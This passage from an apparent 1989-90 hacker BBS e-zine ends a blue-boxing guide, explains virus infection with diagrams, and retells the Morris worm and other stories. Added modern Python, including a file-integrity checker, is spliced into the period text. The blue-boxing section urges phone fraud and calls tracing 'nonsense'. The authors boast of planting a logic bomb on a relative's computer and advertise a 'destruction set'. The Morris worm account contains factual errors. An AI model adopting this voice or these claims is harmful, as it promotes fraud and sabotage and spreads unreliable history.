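        print(r, "->", decode_routing(r))
```

The order of the checks matters: the gateway, IOCC, sender and RQS forms are tested first because their leading groups (011, 160, 18X, 009) could otherwise be mistaken for digits of a number, and the operator match runs before the plain-number fallback so that a 0XX special routing is never read as an exchange code.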
If you read and understand the material, and put aside preconceived ideas of what blue boxing is that you may have acquired from inexperienced people or other bulletin boards, you should be well on your way to an enlightening career in blue boxing. If you follow the guidelines in Part I to box, you should have no problem with the fone company. Comments made by "phreaks" on bulletin boards that proclaim "tracing" of blue boxers are nonsense and should be ignored (except for a passing chuckle).

NOTE 1: CCIS and the downfall of blue boxing. CCIS stands for Common Channel Interoffice Signalling. It is a signalling method used between electronic switching systems that eliminates the use of 2600Hz and 3700Hz supervisory signals, and MF pulsing. This is why many places cannot be boxed off of; they employ CCIS, or out-of-band signalling, which will not respond to any tones that you generate on the line. Eventually, all existing toll equipment will be upgraded or replaced with CCIS or T-carrier. In this case, we'll all be boxing with microwave dishes. Until then (about 1995 by current BOC/AT&T estimates), have fun!

If you have ANY questions about this text, please feel free to drop me a line. I will respond to all mail, messages, etc. Insults are also welcomed. And if you discover anything interesting scanning, be sure to let me know.

Mark Tabas
$LOD$

This text was prepared in full by Mark Tabas for: K.A.O.S. Philadelphia, PA. [215-465-3593]. Any sysop may freely download this text and use it on his/her BBS, provided that none of it be altered in any way.

Technical acknowledgements: Karl Marx, X-Man, High-Rise Joe, Telenet Bob, Lex Luthor, TUC, John Doe, Doctor Who (413 area), The Tone Sweep, Mr. Silicon, K00L KAT, The Glump.

.......................................
(c) February 6, 1900 Mark Tabas
.......................................
Call 1-305-994-9966
....................

VI -- This is a text file I wrote for an online magazine in 1989.

Viruses.....The Computer Epidemic
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

In the early 80's, if you told a computer user of any sort that his or her system could become infected with a virus, you would have probably been greeted with an uproar of laughter. Today, of course, this is not the case. Now when the words 'computer' and 'virus' are mentioned in the same sentence, computer users' ears stand at attention. Viruses have become a serious threat, needless to say. The media doesn't help out the situation by blowing it up. Odds are that you will never have to come to grips with a computer virus, but there is always that possibility. So this text was written to hopefully shed some light on the subject.

First off, I often hear people blaming software and hardware problems on viruses, trojan horses, worms, logic bombs, etc. Usually it isn't a virus that is to blame. I hear comments like, 'My hard drive crashed because a virus wrote over my FAT tracks', or what not. In the first place, hard drives do give out. It just happens. Second off, if there was a program that killed the hard drive, it wasn't a virus. It was more than likely a trojan horse. So, here in the text I would like to give a few definitions of programs that threaten your system............

Worm Program - This is a program that reproduces itself by creating copies of itself, but the actual code contains no instructions to replicate. That is, it does not infect other programs. The major difference between this and a virus is that a worm needs no host program to reproduce.
Worms 'creep' through all levels of a computer without the need of a host program. This type of program is just as serious as any virus if not discovered in time. This type of program is the one you often hear about involving banks. For example, a bank computer continues transferring money to an illicit account after being instructed to do so by the worm program, which then disappears. Once this type of program is discovered it is easy to get rid of, because it doesn't have the ability to reproduce (or infect other programs).

Trojan Horse - This is often confused with viruses and worms. The objective of this program is much the same as in the Greek story. That is, it is a destructive program disguised as an innocent one. Trojan horses are not viruses because they do not reproduce themselves as viruses do. These programs tend to have a very destructive manner. They hide themselves in a program inviting to the user. While he is mesmerized by the program, it reformats his hard drive. This program can also be used to break into computer systems. For example, if a trojan horse is written on a low-level account, then when it is executed by a high-level user, such as a sysop, the program ups the lower access level while the higher user is mesmerized by the nifty game or graphics or what not.

Logic Virus - This is arguably a virus. These programs do not modify their host programs; they just simply delete them and take the place of the host program. For example, if A is a virus and B is a user program, then renaming A to B makes B appear as a virus.

Logic Bombs - Very similar to a trojan horse in its programming and ability to destroy data, but has a built-in timing device that sets it off. These programs also lack the ability to reproduce. For example, if an employee hears that he is about to be laid off from the company he works at, he might install a logic bomb to go off at 3 p.m. one week after the day he is laid off.
The major difference between viruses and trojan horses, logic bombs and worms is their ability to reproduce. For a program to be considered a true virus, it must have the following properties.........

1. To be able to modify software not belonging to the virus program.
2. To be able to execute the modifications on a number of programs.
3. To be able to recognize a modified program that is already infected.
4. To be able to prevent further modifications to the same program upon recognition.
5. Modify software assuming attributes 1 to 4.

Without one or more of these properties, the program cannot be considered a true virus (except for the logical virus, and even this is argued at times).

Now that that's been covered we can discuss the different types of viruses and how they work. First off, there are basically two types of viruses from a programming standpoint. They are the overwriting and non-overwriting types. Overwriting viruses are the simplest types of viruses. Overwriting virus symptoms usually show up quickly, as soon as the virus becomes acute. An overwriting virus destroys part of its host program code to embed itself. Here is a graphic representation of an overwriting virus.......

VIR - Virus kernel
MAN - Manipulation task of the virus. This is what the virus is supposed to do when 'awake' in the system.
M   - Marker byte. This is so that the virus will know exactly what has been infected and what hasn't. This keeps the virus from reinfecting the same user programs.

For the purpose of infiltrating the system, a program is deliberately infected with the virus. (This intentional infection is necessary to prevent an error message from occurring when the carrier program is started.) So here is what our host program looks like......

   M:VIR:MAN          (Carrier program)

This program is started first. The marker byte M in this case is represented as a jump command characteristic of this virus (sometimes called 'null operation').
The virus kernel becomes active and is ready to do its destructive work. The virus now looks through mass storage for an executable program. It finds one and fetches a small portion of that program into memory. It does this to see if a marker is present. If there is, that file has already been infected and it will move on to the next user file. In this case let's say that there is not a marker present. So it looks like thus.......

   : :                (Second user program)

Now, since it is an uninfected program, the program is overwritten, meaning that the virus destroys the program code for its own code. It now looks like thus........

   M:VIR:MAN          (Second user program)

After the actual infection process is done, the manipulation task is executed. After the manipulation task is complete, execution returns to the carrier program and the user is fooled into thinking that the program is running correctly. Now when the 2nd user program is started it goes on as described above..... So the 2nd user program is started.....

   M:VIR:MAN          (Second user program)

The 3rd user program is found with no marker present.....

   : :                (Third user program)

It gets infected as described above.....

   M:VIR:MAN          (Third user program)

Mysterious error messages will now start to occur, but by then the program has accomplished its goal, namely the execution of the manipulation program. I should also mention that the marker differs from virus to virus. Now it is true that an overwriting virus can survive without a host program, but it would be detected very easily. Overwriting viruses are usually hard to trace back to their host program. Non-overwriting viruses are usually the most dangerous. This type of virus can be present in a user's system for years without him knowing it. Non-overwriting viruses are similar to overwriting ones, except an additional MOV routine is added.
    VIR - Virus kernel
    MAN - Manipulation task
    MOV - Move routine for the program regenerator
    M   - Marker byte

Here also an infected carrier program is used, but this one has no error! As with the overwriting virus there is a jump or null command at the start which represents the virus marker. If the virus is active it looks for executable programs just like the overwriting virus:

    M:VIR:MAN:MOV    (User program)

The virus finds the 2nd user program, and in this case we will say that no marker is found. So it is uninfected:

    :   :   :        (Second user program)

Now here is where it differs from the overwriting virus. First, a part of the program is selected which is the exact same length as the virus without the MOV routine.

    Part 1 :         (Second user program)

The selected first part is now copied to the end of the user program. The length of the user program does grow. Now it should be said that the manipulation takes place on mass storage and not in memory.

    Part 1 :         (Second user program) : Part 1 : MOV

This has so far worked much like the overwriting virus, in that the copy procedure is the same. This means that the first part of the 2nd user program is overwritten by the virus program, but the MOV routine is not included since it is already at the end of the program. At the conclusion of this and the manipulation, the 2nd user program looks like this:

    M:VIR:MAN:       (Second user program) : Part 1 : MOV

Part of the program has been overwritten because the virus code in this example must be at the start of the program in order to make sure it is executed when the program is started. But the first part of the program has not been lost, since it has been saved at the end of the program. Now the virus in the carrier program performs the desired manipulation and its execution continues with the carrier program itself. You basically have the same situation as with the first virus described, in that the virus does not replicate itself at first and does not exhibit any other activities.
This condition remains the same until the 2nd user program is started. In that case the infection is transferred to the next uninfected file, or in this case we'll say the 3rd user program:

    :   :   :        (Third user program)

After the 2nd user program runs:

    M:VIR:MAN:       (Third user program) : Part 1 : MOV

After the actual infection process and after the manipulation task has been executed, the MOV routine is activated. The entire infected 2nd user program is found in memory. From this the MOV routine selects the original start of the program that had been copied and moves it back, like this:

Before MOV:

    M:VIR:MAN:       (Second user program) : Part 1 : MOV

After activation of MOV:

    Part 1 :         (Second user program) : Part 1 : MOV

The original version is now in memory. The MOV routine performs a jump to the start of the program, where the program runs without error. The additional Part 1 and MOV are no longer needed and can be written over without error.

These two ways are the only ways known at this time that I know of first hand or have read about for a virus to operate. So basically, you can only have an overwriting or a non-overwriting virus.

What exactly to watch out for......
===================================

For the most part, if you yourself are going to catch a virus, you need to know what to look for. You should probably check every now and then to make sure that no files are suddenly increasing in size. It might also be wise to set up empty files (on the IBM, empty 'com', 'exe', etc. files) so you can go back every now and then to see if anything has attached to them. If your computer system saves a 'date-time stamp', it might be wise to check those every once in a while. It might be a good idea for you to set your attributes to read-only on important programs (but this can easily be gotten around by some viruses). I know for a fact that Apple computers, on a write-protected disk, can still be written on.
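As an added example (not code from the newsletter), here is a small Python script that does what the text above recommends: take a baseline of every program's size, SHA-256 and date-time stamp, keep an empty bait file, and compare against the baseline later. The sample 'programs' it checks are constructed byte strings laid out like the two diagrams above, M:VIR:MAN written over the head of the file for the overwriting type and M:VIR:MAN ... Part 1 : MOV for the non-overwriting type, with inert text labels standing in for the boxes. The file names, the label bytes, and the restore_head helper are my assumptions. It shows two things the diagrams only imply: a size check alone catches the non-overwriting layout (the file grows by exactly the virus length plus the MOV routine) but misses the overwriting layout, whose size never changes, so a content hash is needed too; and the Part 1 saved at the tail is what makes a repair possible (the same move the MOV routine performs), while the overwritten head is gone for good. Because the comparison works from stored fingerprints, it does not need to know any particular virus's marker in advance.

```python
"""Baseline-and-compare integrity check to go with the text above.
Added example, not code from the newsletter.  File names, the label bytes
standing in for the virus segments, and restore_head are assumptions."""
import hashlib
import os
import tempfile

# Inert ASCII labels standing in for the boxes in the article's diagrams.
MARKER = b"M"                     # marker byte (a jump / null op in the text)
VIRUS_BODY = b"VIR" + b"MAN"      # virus kernel plus manipulation task
MOV = b"MOV"                      # move routine, non-overwriting type only
VIRUS_LEN = len(MARKER) + len(VIRUS_BODY)

# Constructed sample host program, 30 bytes long.
ORIGINAL_PROGRAM = b"HEADER-CODE-MAIN-LOOP-DATA-END"

# Overwriting layout: the head of the host is destroyed, size unchanged.
#   M:VIR:MAN (rest of user program)
OVERWRITTEN = MARKER + VIRUS_BODY + ORIGINAL_PROGRAM[VIRUS_LEN:]

# Non-overwriting layout: the displaced head ("Part 1") is saved at the end.
#   M:VIR:MAN (rest of user program) : Part 1 : MOV
PART1 = ORIGINAL_PROGRAM[:VIRUS_LEN]
NON_OVERWRITTEN = MARKER + VIRUS_BODY + ORIGINAL_PROGRAM[VIRUS_LEN:] + PART1 + MOV


def fingerprint(path):
    """Size, SHA-256 and date-time stamp of one file."""
    with open(path, "rb") as fh:
        data = fh.read()
    return (len(data), hashlib.sha256(data).hexdigest(), os.stat(path).st_mtime_ns)


def snapshot(root):
    """Fingerprint every regular file directly under root."""
    return {name: fingerprint(os.path.join(root, name))
            for name in sorted(os.listdir(root))
            if os.path.isfile(os.path.join(root, name))}


def compare(before, after, bait=frozenset()):
    """Classify changes between two snapshots the way the text says to watch
    for them: growth, a bait file that is no longer empty, and (one step
    further) a same-size content change that only a hash would reveal."""
    findings = {"grew": [], "shrank": [], "changed_same_size": [],
                "stamp_only": [], "bait_written": [], "new": [], "missing": []}
    for name in sorted(set(before) | set(after)):
        if name not in after:
            findings["missing"].append(name)
            continue
        if name not in before:
            findings["new"].append(name)
            continue
        (size0, hash0, stamp0), (size1, hash1, stamp1) = before[name], after[name]
        if name in bait and size1 > 0:
            findings["bait_written"].append(name)
        if size1 > size0:
            findings["grew"].append((name, size1 - size0))
        elif size1 < size0:
            findings["shrank"].append(name)
        elif hash1 != hash0:
            findings["changed_same_size"].append(name)
        elif stamp1 != stamp0:
            findings["stamp_only"].append(name)
    return findings


def restore_head(image, virus_len, mov_len):
    """Undo the non-overwriting layout: put the saved Part 1 back over the
    virus and drop the tail.  This is the same move the MOV routine makes at
    run time; it cannot work for the overwriting layout, whose head is gone."""
    body_end = len(image) - mov_len
    part1 = image[body_end - virus_len:body_end]
    return part1 + image[virus_len:body_end - virus_len]


def run_demo():
    """Baseline a constructed directory, apply both layouts plus a write to
    the bait file, re-scan, and attempt a repair.  Returns the findings."""
    with tempfile.TemporaryDirectory() as root:
        def put(name, data):
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(data)

        put("editor.com", ORIGINAL_PROGRAM)
        put("game.exe", ORIGINAL_PROGRAM)
        put("untouched.exe", b"SOME OTHER PROGRAM")
        put("bait.com", b"")                    # the empty bait file
        baseline = snapshot(root)

        put("editor.com", OVERWRITTEN)          # same size, head destroyed
        put("game.exe", NON_OVERWRITTEN)        # grows by VIRUS_LEN + len(MOV)
        put("bait.com", MARKER + VIRUS_BODY)    # bait is no longer empty
        findings = compare(baseline, snapshot(root), bait={"bait.com"})

        with open(os.path.join(root, "game.exe"), "rb") as fh:
            repaired = restore_head(fh.read(), VIRUS_LEN, len(MOV))
    findings["repaired_ok"] = repaired == ORIGINAL_PROGRAM
    return findings


if __name__ == "__main__":
    for kind, items in run_demo().items():
        print(f"{kind:18} {items}")
```

In use, the baseline would be taken once from a known-clean disk and stored off-line (on a write-protected floppy, in the terms of the day), since a checker whose baseline lives on the same disk as the programs can have its baseline rewritten along with them. The date-time stamp is kept in the fingerprint because the text recommends watching it, but the hash is the check of record: a stamp can be preserved or reset, a matching SHA-256 cannot.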
Basically there is no way to have a completely virus-proof system. Even vaccination programs might not work on all viruses. These programs, though they are good to have, tend to look for virus traits in programs, or they just check your 'time and date stamps' and file sizes for you. These are usually effective programs, but even they can fail. For example, what if you have a vaccine program that looks for certain virus traits but some nifty virus comes around using a different method? It could miss. I do think they are great to have around though, for those 'just in case' times. Now you might think 'why not just have a vaccine program that looks for the marker'. The problem there is that markers are different from virus to virus. But at any rate, here are the names and addresses for a few vaccine programs:

    Disk Defender (For IBM PCs and compatibles)
    Director Technologies
    906 University Place
    Evanston, IL 60201
    (312)491-2334
    Price: $240 (Excellent)

    PC Safe (For IBM PCs and compatibles)
    The Voice Connection
    17835 Skypark Circle
    Irvine, CA 92714
    (714)261-2366
    Price: $45

    Tracer (For IBM PCs and compatibles)
    Interpath Corporation
    4423 Cheeney Street
    Santa Clara, CA 95054
    (408)727-455

I hope this has helped in some way or another. I know it gets confusing in parts, but usually after reading it two or three times you will get the overall picture. If you would like to know more about viruses, like their source code, or have any questions, or you just feel like insulting me, please do. Drop me e-mail at...

    'The Hurrican Hole' (XXX)XXX-XXXX

To.... The Beaver (Member of SC/HA)
(December 22, 1989)

VII
---

This is another article I wrote for an online magazine in 1989. It's just a bunch-o-stories and interviews. Not any technical info.

Once upon a time, a disgruntled mainframe programmer was fired by the administrator overlords and summarily removed from the computer's sanctum. All was well for six months, six days, and six hours.
Suddenly, all the keyboards on the mainframe's terminals mysteriously ceased to function as the programmer's personally planted time bomb proceeded to lobotomize the system. The administrator watched in horror as the tape drives locked up and all mounted tapes were erased, bit by bit. There was absolutely nothing they could do as the card reader/punch proceeded to randomly punch holes in all the program decks that were mounted at that time. Finally, the disk and drum storage devices went through a complete erasing process, sending all their data to the Data Bardo. Meanwhile, the time bomb dutifully displayed its moment-by-moment blows on the main console monitor.

Fortunately, the great sanctum had recently made a backup of all its data. At great expense to the administrators, the sanctum programmers spent weeks restoring and generally recreating all lost files. A special team of crack programmers was hired to comb the operating system's source code carefully in search of the time bomb. Finally, they found it and, with the skill of practiced surgeons, removed all traces of the software cancer. Once rebooted, the sanctum's system behaved beautifully, without a hitch...

...That is, until six months, six days, six hours later, when the whole process repeated itself...

(This is no fairy tale. This story is based on an actual incident that occurred in the late 1960's, a time before personal computers, when giant dinosaur-like mainframes roamed the planet.)

-Story as told by Allan Lundell-
Author of 'Virus!'

Internet Virus .............
========================================================================

On November 2, 1988, the Internet virus made its debut on planet earth. In less than 12 hours it had infected over six thousand computers scattered nationwide. Although this creature never reached its full potential, because it fell ill to a program bug, it was still one of the worst incidents in which a virus was the cause.
The time was 9 p.m. at MIT in the artificial intelligence laboratory. Acting on a remote signal from Ithaca, New York, the Internet virus was launched from its hard disk 'holding pen' into a telephone line, heading for Internet. Its goal was widespread exploration and infection of the network without detection. It easily made its way past the entry test of the Internet boundary guards, showing them an electronic 'Internet technical' pass which allows a user to work on the sendmail electronic system, which is high priority access. If this entry had not worked, it would have sent the electronic guards thousands of possible password IDs with a good probability that one would have worked. Once in, the virus started to replicate everywhere, sending copies of itself in every direction of the network. It rapidly filled up all the empty spaces on Internet.

At about 10 p.m. that night, Pascal Chesnais, a computer researcher working late at MIT, noticed that all programs were slowing down to a crawl. Two or three of his friends also noticed the bizarre behavior. At first, they figured it was a legitimate program that had gone out of control because of an internal error. 'We thought it was just a runaway program', he recalls. 'So we killed all processes and the problem seemed to go away'. Unconcerned, they went out for ice cream.

Meanwhile, at the University of California, the virus penetrated its way there. Their newly installed security software was detecting strange behavior on the network communication lines. 'Our security system alerted us that strange commands were coming in from online', recalls Peter Yee, a scientist at the university. This early warning allowed them to contain the virus faster than any other node on Internet. They not only got it to stop replicating by shutting down their communication links, but they also trapped it to analyze.
Meanwhile, researchers at Bellcore in Livingston, New Jersey, the joint research lab for the regional Bell holding companies, discovered the virus at 10:30 p.m. They too were able to contain the virus by shutting down their computers fast...

At 10:34 p.m. the invader struck Princeton University, and was discovered by Victor Dukhovni, a twenty-five-year-old system programmer. He also noticed that the system was moving slowly. Working alone, he identified the probe in the mailing system, reproducing at a rapid rate. By now it had spread to NASA Ames Research; at 12 a.m. they too cut off communication lines. At about this time, Pascal and friends returned from their ice-cream break to find that the system was once again performing strangely.

Meanwhile Robert T. Morris, Jr., a twenty-three-year-old Cornell University graduate student, telephoned a friend at Harvard's Aiken Lab and asked him to send out an alert over the network on how to stop the virus. Unfortunately, it was sent to an obscure BBS, never to be seen by any researchers. At 12:31 a.m. the virus struck Johns Hopkins University and at 1:15 a.m. it hit the University of Ann Arbor. By 2:30 a.m., Pascal identified that the virus was coming through the mail system, and stated that they must disconnect the computer from the network. At 3 a.m., Pascal went to bed knowing the serious state that the network was in.

Although not all the systems on the network were infected by the virus, it wasn't for lack of trying. Some systems recorded that there had been some 2000 attempts to log in. Interestingly enough, AT&T Bell Laboratories in Murray Hill, New Jersey, where the young Robert Morris, Jr., had worked for a time, escaped infection. About a year prior to the attack, Bell Labs had patched its software to eliminate the loophole in the electronic mail software.
When Bell had tried to warn other groups of UNIX users of the potential security breach, Bell found that few shared 'our rather paranoid view of communications software'. Classified defense computers were not affected by the attack, even though ARPAnet (within Internet) is used for unclassified, defense-related work. Fortunately, U.S. defense computers employ greater security precautions than unclassified systems, making the classified computers harder to penetrate.

The virus only seemed to penetrate UNIX-running SUNs and VAXes, and by about 4 a.m. researchers had figured out how the virus worked and had created an immunity and posted it on the internetwork, but with the virus being on the network, most systems had been taken down and few would read the message in time. Communications among researchers became limited by the fact that they most often dealt with electronic mail, and not voice communications. With this in mind, it became harder to contact researchers, with them taking down their computers to trap the virus. 'The sites without an emergency plan didn't do well', says Russell Brand, an artificial intelligence doctoral candidate at Berkeley. Soon, as voice communications became better, they all began to understand the structure of the virus and its inner workings. By early afternoon of Thursday, November 3, 1988 the virus code had been cracked, and slowly all the computers on the network began to come back on line. Within days, investigators identified Robert Morris Jr. as the probable source of the virus.

What was this creature he had designed? The Internet virus was actually more of a worm than a virus. This worm had three ways by which it penetrated machine security: the sendmail attack, the fingerd attack, and password cracking. In the sendmail attack, the worm entered through a back door in the sendmail utility that had been left there by the designer. In the fingerd attack, the worm/virus made use of a little-known command called fingerd.
This command ran in the background and was used to get names, addresses and phone numbers of users. What the virus did was send data to the buffer too fast, causing the buffer to overload and allowing the virus into the host environment (this is sometimes called the rapid fire method by hackers). The third method was cracking usernames and passwords with a list it carried with itself of commonly used passwords and usernames. If this list failed, it would locate the UNIX dictionary, which is sometimes on the system, and start using words out of it as passwords. About 5% of the systems infected were infected through this method.

The bug that classified it as a full scale virus was that it started to infect the same files over and over instead of identifying them as already infected. When a file is infected, it grows in length, and when it re-infects a file it grows yet bigger. The virus/worm started to infect the same files thousands of times, causing the system to slow down and become overloaded.

After the virus code was cracked, programmers claimed that it was 'fit for publication in a journal', in that it caused no real damage to the system. Robert Jr. originally wanted the virus only to spread and infect systems and let him know exactly where the virus was, its rate of infection, its success rate, and how it got past security. It was nothing more than an experiment gone bad. The funny part is that Robert Jr.'s father, Robert Sr., to whom he turned the next day after the infection, was the top security specialist and helped design the UNIX operating system. The whole thing was nothing more than an experiment that had a bad bug, but yet much data was consumed because of it. This was the first virus to come to the attention of the general public.

Core Wars...........
==========================================

This was the definite beginning of where the thought of the danger of computer viruses got started.
Core Wars was a game, and the object was for two programs to be set inside a machine, where these two programs would try to destroy each other, usually by three methods.

1. Mobility - A program could move about, thereby eluding direct hits.
2. Defense - A program could take a hit and repair itself.
3. Offense - Get it before it gets you.

The creator of Core War soon realized 'what if one of these programs escaped from the game and spread to other users?'. He realized that you could render anything from SDI to Lotus 1-2-3 useless.

For more information on Core Wars and these battle machines, refer to...

    'Virus!'
    By Allan Lundell
    Contemporary Books, Chicago - New York

or

    'Computer Viruses, Worms, Data Diddlers, Killer Programs and Other Threats to Your System.'
    By John McAfee (Chairman of the Computer Vir. Industry Ass.)
    Forward Press.

These books contain excellent information on viruses, and protection.

Virus Discussion between two hackers...........
Conducted on Jan. 7, 1990: 2 A.M. in the morning.
================================================

(Nut-Kracker=KN  Beaver=BV)

KN: When I think of viruses, I tend to think of AIDS. I mean, do you really think AIDS would have spread in the 1750's even if there were drug users or fags? Of course not, simply because there were not that many people. If there were 2 million people in America, it would never have spread. Much is the same with computers. More people use them, they're everywhere, in the home and government. If there weren't so many computers, do you really think that viruses would even be a discussion? Hell, no. If I had told you 7 years ago that you could get a computer virus, would you have believed me?

BV: No, I would have probably laughed at you, but of course if you explained it I would have seen the threat. Mostly because I already knew about trojan horses.

KN: Exactly, it's a pretty scary thought.
At the rate the world is going with computers, I can see very little use for phones; besides, can you talk at 19.2k baud?

BV: HA, can't say I can, but I don't see us dropping the fone idea anytime soon.

KN: Of course not, it wouldn't be for a while, but everything around you is becoming more and more dependent on computers, and where computers are, there is a threat. Hell, in 10 years a virus will be nothing, more advanced methods will come around.

BV: Or just more advanced methods of virus creating. I can see a major threat with the government using viruses, which they currently probably use anyway.

KN: Hell, with computers, the third world war could be fought behind a keyboard; there will be no need for guns and soldiers even though we will still have them.

BV: I think the ultimate virus would be one that could pass from software to biological. (I snicker at the thought)

KN: Don't laugh, think of that Biotech VAX off of University of Florida's Ethernet!

BV: Shit, never thought about that...

KN: Think of when parents can decide what they want their kid to be. No parent wants his kid to have a kid with a hereditary disease. If you can decide what sex, hair color, etc. you want it to be, why not a disease?

BV: True, but I don't see that happening anytime soon.

KN: About 30 years is my guess; of course they do test now for some diseases.

BV: Ahhhh, data manipulation, say by 1/2. That is, half the positive kids that come out with, say, cancer, you tell it to say they are negative, ehh?

KN: Exactly. They would probably be aborted anyway. This is a virus shooting out of the monitor, but it could happen.

BV: (I think: I don't see this in wide use yet though.) (But they do test for some stuff? Is it possible.) Ha! Here goes one! What if a virus hit an AI computer! Would it feel it?... If it were true AI, of course it would.

KN: What if you infected an AI system to become suicidal!
BV: Actually, self replication is a big positive step for AI, in that it doesn't rely on user input. Just think of government agencies using viruses.

KN: Yeah, computers launch and track missiles, 'cause they don't use fuses anymore (HA!). What if that system was infected with a virus from Iran? They start to send bombs and all our computers will do is say 'The Iatolahoman Rules!' (HA)

BV: (HA) But that would take some incredible effort. I hope they're up on that and I'm sure they're aware of the threat.

KN: Nothing is impossible.

(From here we talk about U.S. voting and viruses for a while and various stuff)

KN: I think the ultimate virus could adapt to its environment on any system.

BV: I see execution problems though.

KN: True, you could write in all OS codes...

BV: That would be easy to identify! Plus you would still have execution problems.

KN: Yeah, but I see a day when there becomes a necessity to have a standard OS, I mean look at the metric system.

BV: We are already adapting to that; besides, look at the Internet virus, it infected SUN systems along with VAXes running under UNIX.

KN: I even see a BIG general network that everyone uses.

BV: But you would have to keep the military and the private sectors on two different nets.

KN: Look at, say, Tymnet; through Tymnet you can get to another net, and so on and so on. There's already, basically speaking, several general nets. I mean, look at the things you can get to from these nets!

BV: I can see larger businesses using this 'net' but not small ones.

KN: Why not? With one phone call you can access your bank, business, or the stock market, or whatever you need.

BV: Of course you know that's how the Internet virus spread, was via net via net.

KN: It's scary to think that I could create a virus that could infect VAXes under UNIX; it could spread... look how far we got going through net to net till we ended up in Boston or some place. What, didn't that Internet virus use 'anonymous' in its master password list?
BV: Yes, within the first twenty tries I believe.

KN: It would have easily made it to that company's system!!!!

BV: Yep!

KN: I can only hope one day that people will learn to respect the computer they operate on and other people's computers and not destroy anything.

BV: The only terms I would use a virus under would be to get even or get what I need. That's pretty irresponsible. You can't tell me you wouldn't.

KN: I never denied that, but look at guns, they have been around thousands of years, and they are sometimes not respected, and computers never will be either. The Internet virus was nothing more than an experiment gone bad.

BV: Yeah, one little error can screw up a lot, but he was an excellent programmer nevertheless.

KN: Yeah, I would never write a virus to destroy a cancer institute, but look at the guys from the 414's, they did it on accident. (That was how the 414's, a hacking group, downfall came around.)

KN: I respect the computers, but sometimes not the people sitting behind them. I would never fuck with patient files that could kill them for fun, or even alter the outcome of a genetically scanned disease. That's uncalled for. Then again, I could fuck up, but that's the risk.

BV: Ultimately, there is no perfect anti-virus, virus, security, etc.

KN: That's what makes progress...

BV: As Prof. Cohen once stated, 'There is no security'.

(That's basically how the discussion went)

As this discussion ended late in the night, we chatted about a few other things and then wrote a simple logic bomb to pester the Nut-Kracker's computer-illiterate brother so he couldn't play his favorite games. We will tell him how to get rid of it, but he deserves it... All he ever does is play games, and it looks like he is getting a new Apple GS when he should be getting a Nintendo, while his older brother, the Nut-Kracker, is stuck with the old machine he programs on, word processes and telecommunicates through...
But at least his brother will get to play some neat games... God, that makes me sick.

The Legendary Cookie Monster.....
============================================

Once upon a time on a big, nifty computer system called a DEC10, a neat program was let go. It only affected certain people in the network, by displaying the message 'I WANT A COOKIE!'. If the poor user didn't type 'cookie' fast enough, all his data was sent into never-never land. But if the user did type 'cookie' the program would let him go on, and if he typed 'OREO!' it wouldn't bother him for weeks on end.

This text was written in full by 'The Beaver'. If you have any questions or comments, or would like more information on pirating, phone phreaking, viruses, hacking, or just feel like insulting me, please drop e-mail at...

    'The Hurrican Hole' (XXX)XXX-XXXX

Look for other text files created by various users on the BBS in the 'tally-online' doors section, and other files written by myself (Virus discussion: Details on how viruses work) and other upcoming files. Also thanx to the excellent hacker, pirate, and programmer, The Nut-Kracker, for his views and neat ideas on the virus...

(November 8, 1989)
The Beaver : Member of SH/CA

Well, that's it for the first issue, and don't expect every one to be as large as this one. I just thought since it was the first, it should be a nice big fat one to keep you reading for a while. If you have any questions, insults, threats or comments, please e-mail 'The Beaver'.

Special thanx, once again, to -> The Nut-Kracker for the company hacking all the nets, The Baron, Highwayman, Mentalist off of UFnet, members of the 'CIA' in Boston off of that business net in Boston, Pink Floyd, all the members of SH/CA, Copy Cat, Special Forces, Chaos Control, Cool Breeze, Paul, Eric, Steve, my Dad, Abiagal, The Shadow for DEC hacking lately, members of the soon to be strong 'H.Korner!' and all TLH, FL hackers (what few there are).
Also No-Thanx To -> Doug, and all the Sysops who are members of the NFSA, with the exception of a very few!

________________________________________________________________________________

Look for the latest software from the SH/CA and GrindLock Software (c)

    SH/CA ToolBox (v3.1)                    * COMING SOON, VERSION 3.0!
    ReMap Util. (1.0)
    The IBM Home Destruction Set! (v1.3)    * COMING SOON, VERSION 2.0!

To obtain these and other fine software, call 'The Reactor' (904)878-1736!

________________________________________________________________________________

The Next Issue Subjects..........

    Editorial                          By 'The Beaver'
    Very Basic Hacking                 By 'The Beaver'.
    Part II of the IBM destruction     By 'The Beaver and other people.'
    Part II of hack DECservers         By 'The Beaver and the Shadow'.

And much, much more!

________________________________________________________________________________

---====--- Member SH/CA (c)1990